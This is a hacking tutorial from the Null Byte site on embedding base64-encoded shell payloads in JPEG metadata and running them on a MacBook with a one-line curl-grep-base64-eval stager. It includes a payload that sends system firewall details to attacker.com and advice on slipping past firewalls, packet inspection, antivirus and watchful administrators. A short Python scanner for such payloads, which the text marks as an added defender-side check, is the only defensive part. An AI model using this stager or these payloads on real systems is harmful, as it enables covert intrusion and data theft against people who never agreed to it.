How to Hide Payloads Inside Photo Metadata « Null Byte :: WonderHowTo

Complex shell scripts can be embedded in photo metadata and later used to exploit a MacBook. In addition to obfuscating the true nature of an attack, this technique can be used to evade network firewalls and vigilant sysadmins.

In this attack scenario, a malicious command is embedded directly in the EXIF metadata of an image file. The attacker would host the malicious image on a public site like Flickr, making it available for anyone to download. A stager is then created to download the image, extract the metadata, and execute the embedded command.

To be clear, double-clicking the image file does not execute the embedded command. That is a different type of macOS attack, one we've covered in another article. Instead, the command is hidden in the metadata of the image and used as the payload delivery system. The stager and the payload are two different aspects of the attack: the stager is designed to download the image and execute the embedded payload, while the payload is the final bit of code (embedded in the image) that runs one or more commands.

Why embed payloads in photos?

So, why have a stager at all when the attacker is already capable of executing code on the target MacBook? Well, mainly, varying degrees of evasion. Stagers can also be quite small, just ~100 characters long, making them faster to execute with a USB Rubber Ducky or MouseJack attack, for example.

In most scenarios, it is not necessary to hide a payload in an image file. But in very secure environments, where every domain is logged by firewall software, it may be beneficial to hide the payload's content and origin.

1. Firewall Evasion

With software such as pfSense, every domain and IP address that each device on the network visits is logged. With commercial products such as Fortinet's FortiGate firewall, every packet can be thoroughly dissected for analysis. These types of firewalls make it difficult for an attacker to use simple TCP connections established with Netcat to persist on the compromised device or to move further into the network.

Using images to hide payloads can make it harder for sysadmins monitoring traffic to identify the activity as malicious or suspicious.

2. Deep Packet Inspection Evasion

In secured environments, operating systems can be configured to trust proprietary certificates, allowing network administrators to decrypt data to and from devices on the network. With tools like Wireshark, it is possible to reassemble TCP streams and recover image files from the raw data.

3. Antivirus Evasion

Premium versions of Avast and AVG antivirus software can analyze and detect certain types of stagers and payloads. For example, the AV software can identify most stagers created by Empire. In hardened network environments, a high degree of obfuscation may be required to evade detection signatures. Unusual stagers can make it difficult for AV software to detect the true nature of a particular file.

Tools to Be Familiar With

Before moving forward, you should be generally comfortable with tools like curl, system_profiler, exiftool, grep, and Bash scripts. All of these subjects have been covered on Null Byte before in one way or another.

Step 1: Download an Image

To get started, download the image to be used in the attack. The stager (shown in a later step) does not actually save the image to the target computer, so it does not have to be a picture of anything particularly relevant. For demonstration purposes, we can use my Twitter profile picture, which can be downloaded with wget and saved (-O) to the /tmp directory.

  wget 'https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg' -O image.jpg

  --2019-05-15 06:50:22--  https://pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg
  Resolving pbs.twimg.com (pbs.twimg.com)... 72.21.91.70, 2606:2800:220:1410:489:141e:20bb:12f6
  Connecting to pbs.twimg.com (pbs.twimg.com)|72.21.91.70|:443... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 19316 (19K) [image/jpeg]
  Saving to: 'image.jpg'

  image.jpg    100%[=================================>]  18.86K  64.4KB/s    in 0.3s

  2019-05-02 06:50:25 (64.4 KB/s) - 'image.jpg' saved [19316/19316]

Step 2: Generate the Payload

For this example, we'll first learn to execute a simple command. When the stager runs the payload embedded in the image, it will create an empty file named "hacked" on the macOS desktop.

First, use printf, base64, and tr to encode the payload. Base64 will encode the string, while tr will delete (-d) the trailing newline (\n). The payload (touch ~/Desktop/hacked) should always be wrapped in single quotes.

  printf 'touch ~/Desktop/hacked' | base64 | tr -d '\n'
  dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==

A more complex payload involving the macOS system_profiler command can be used to perform situational awareness, together with curl to exfiltrate the command's output to the attacker's server.

  printf 'd=$(system_profiler SPFirewallDataType);curl -s --data "$d" -X POST http://attacker.com/index.php' | base64 | tr -d '\n'
  ZD0kKHN5c3RlbV9wcm9maWxlciBTUEZpcmV3YWxsRGF0YVR5cGUpO2N1cmwgLXMgLS1kYXRhICIkZCIgLVggUE9TVCBodHRwOi8vYXR0YWNrZXIuY29tL2luZGV4LnBocA==

To take it a step further, it would be possible to encode an entire Bash script into a single line. In my tests, there was no limit to the number of characters that can be embedded in a metadata tag.

  cat /path/to/any_script.sh | base64 | tr -d '\n'

Step 3: Embed the Payload in the Image

To insert the encoded payload into the image, install exiftool.


  apt-get update && apt-get install exiftool -V

  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  Note, selecting 'libimage-exiftool-perl' instead of 'exiftool'
  The following additional packages will be installed:
     libarchive-zip-perl (1.64-1)
     libmime-charset-perl (1.012.2-1)
     libposix-strptime-perl (0.13-1+b5)
     libsombok3 (2.4.0-2)
     libunicode-linebreak-perl (0.0.20190101-1)
  Suggested packages:
     libencode-eucjpms-perl (0.23-5+b1)
     libpod2-base-perl (0.043-2)
  The following NEW packages will be installed:
     libarchive-zip-perl (1.64-1)
     libimage-exiftool-perl (11.16-1)
     libmime-charset-perl (1.012.2-1)
     libposix-strptime-perl (0.13-1+b5)
     libsombok3 (2.4.0-2)
     libunicode-linebreak-perl (0.0.20190101-1)
  0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
  Need to get 3,629 kB of archives.
  After this operation, 21.0 MB of additional disk space will be used.
  Do you want to continue? [Y/n]

Delete any EXIF metadata that may already be in the image.

  exiftool -all= image.jpg
  1 image files updated

Then use exiftool to add a metadata tag. Any unused tag will work as the container for the encoded payload; the Certificate tag is used in this demonstration.

  exiftool -Certificate='dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==' image.jpg
  1 image files updated

Once that's done, verify the Certificate tag was added correctly by running the following exiftool command. Notice the encoded string on line 13.

  exiftool image.jpg

  01 ExifTool Version Number         : 11.16
  02 File Name                       : image.jpg
  03 Directory                       : .
  04 File Size                       : 21 kB
  05 File Modification Date/Time     : 2019:05:02 06:50:57+00:00
  06 File Access Date/Time           : 2019:05:02 06:50:57+00:00
  07 File Inode Change Date/Time     : 2019:05:02 06:50:57+00:00
  08 File Permissions                : rw-r--r--
  09 File Type                       : JPEG
  10 File Type Extension             : jpg
  11 MIME Type                       : image/jpeg
  12 XMP Toolkit                     : Image::ExifTool 11.16
  13 Certificate                     : dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA==
  14 Image Width                     : 400
  15 Image Height                    : 400
  16 Encoding Process                : Progressive DCT, Huffman coding
  17 Bits Per Sample                 : 8
  18 Color Components                : 3
  19 Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
  20 Image Size                      : 400x400
  21 Megapixels                      : 0.160

Step 4: Upload the Image to a Website

Finding a suitable website is tricky. There are several criteria to consider.

Avoiding EXIF Data Sanitization

Many popular sites like Twitter, Imgur, and Instagram automatically strip metadata from images when they are uploaded. This is mainly done to protect users from accidentally uploading images containing GPS coordinates, which would allow cyberstalkers and cyberbullies to locate and harass them.

Images containing payloads would have them stripped when uploaded to such sites. A candidate website must be tested manually by first uploading the image, then downloading it and using exiftool to check whether the embedded payload is still intact.

Web Encryption

Transport layer security is important for further obfuscating this attack. The site used to host the image should use HTTPS, which will help prevent sysadmins from analyzing the GET request with surgical precision.

Web Traffic Anomalies

Ideally, the site used in the attack would be one the target visits frequently. For example, if the target visits a particular news site every morning, a request to that domain would not look suspicious to sysadmins monitoring traffic on the network. On the other hand, an unusual GET request to a foreign website or an adult site would probably raise some red flags. This type of information can be gathered during the reconnaissance phase with covert packet captures. The key is to make the traffic look as normal as possible for the target's web browsing habits.

Step 5: Generate the Stager

In my quick attempts to extract metadata from images with built-in macOS tools, none seemed to access or display the particular string ("Certificate") of EXIF metadata that is embedded in the image. Fortunately, grep has an -a option that allows it to process binary files (i.e., images) as if they were plain text, so it can find the "Certificate" string in the metadata.

Below is an example stager that can be used to download the image, extract and decode the payload, and then run the command(s).

  p=$(curl -s https://website.com/image.jpg | grep Cert -a | sed 's/<[^>]*>//g' | base64 -D); eval $p

There is a lot going on here, so I'll break down each section of the stager.

  • p=$(...) - Most of the stager is enclosed in a variable called "p" (aka payload), so nothing is saved directly to the target's macOS hard disk.
  • curl -s https://website.com/image.jpg - curl is used here to silently (-s) download the image containing the payload from a site chosen by the attacker. The image is immediately piped (|) into the following grep command.
  • grep Cert -a - grep takes the raw image data, processes it as plain text (-a), and searches for the "Cert" string. The matching output is the XMP line that contains the tag and its value.
  • sed 's/<[^>]*>//g' - The above output is immediately piped into this sed command, which removes all of the surrounding XML tags, leaving only the encoded string.
  • base64 -D - The encoded string is piped into this base64 command, where it is decoded with the -D option (the uppercase flag used by the macOS base64), which ultimately makes the $p variable hold the decoded payload.
  • eval $p - Finally, eval is used to evaluate the variable as a command, effectively executing the payload held in the variable.
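As an added defender-side check (not part of the original article), the following Python script walks a JPEG's APP1 segments, pulls out the XMP packet that exiftool writes in Step 3, and flags any tag whose value base64-decodes to shell text, which is the same data the Step 5 stager extracts with grep -a. The sample JPEG is constructed inline; the xmpRights:Certificate tag name and the SHELL_HINTS list are assumptions.

```python
import base64
import re

XMP_HEADER = b"http://ns.adobe.com/xap/1.0/\x00"
# Tokens that rarely occur in legitimate metadata but do in a shell payload.
SHELL_HINTS = ("$(", "|", ";", "&&", "curl ", "touch ", "eval ", "/bin/")


def xmp_packets(data: bytes):
    """Yield the XMP text of every APP1 segment before the scan data starts."""
    pos = 2                                    # skip the SOI marker FF D8
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):             # EOI or SOS: metadata is over
            break
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        body = data[pos + 4:pos + 2 + length]
        if marker == 0xE1 and body.startswith(XMP_HEADER):
            yield body[len(XMP_HEADER):].decode("utf-8", "replace")
        pos += 2 + length


def tag_values(xmp: str):
    """(tag, value) pairs for XMP properties written in element form."""
    return re.findall(r"<([\w-]+:[\w-]+)>([^<]+)</\1>", xmp)


def decode_if_command(value: str):
    """Decoded text if value is base64 of printable text with shell syntax."""
    try:
        text = base64.b64decode(value.strip(), validate=True).decode("ascii")
    except ValueError:                         # not base64, or not ASCII
        return None
    if not all(c.isprintable() or c in "\n\t" for c in text):
        return None                            # binary blob, not a script
    return text if any(h in text for h in SHELL_HINTS) else None


def scan_image(data: bytes):
    """List (tag, decoded_command) for every suspicious tag in a JPEG."""
    return [(tag, cmd) for xmp in xmp_packets(data)
            for tag, value in tag_values(xmp)
            if (cmd := decode_if_command(value)) is not None]


def build_sample_jpeg(tag: str, value: str) -> bytes:
    """Constructed minimal JPEG carrying one XMP tag (not a real photo)."""
    xmp = (f'<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF><rdf:Description>'
           f"<{tag}>{value}</{tag}></rdf:Description></rdf:RDF></x:xmpmeta>")
    body = XMP_HEADER + xmp.encode()
    app1 = b"\xff\xe1" + (len(body) + 2).to_bytes(2, "big") + body
    return b"\xff\xd8" + app1 + b"\xff\xda\x00\x02\xff\xd9"
```

Running scan_image over the image built with the article's Certificate value returns the decoded touch command, while a tag holding ordinary text such as a copyright notice is not flagged.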

We can verify that the attack was successful by finding the "hacked" file on the macOS desktop.

Again, this is a very simple payload. More sophisticated attacks could involve automated browser dumping, microphone eavesdropping, situational awareness, privilege escalation, sudo password phishing, and so on.

That's all there is to hiding a payload within image metadata. Stay tuned, as I'll show you how to exfiltrate data inside images, without using metadata tags, in a future article! Hit me up on Twitter @tokyoneon_ if you have any questions, or leave a comment below.

Don't Miss: Connect to a Backdoored MacBook from Anywhere in the World

Cover photo and screenshots by tokyoneon/Null Byte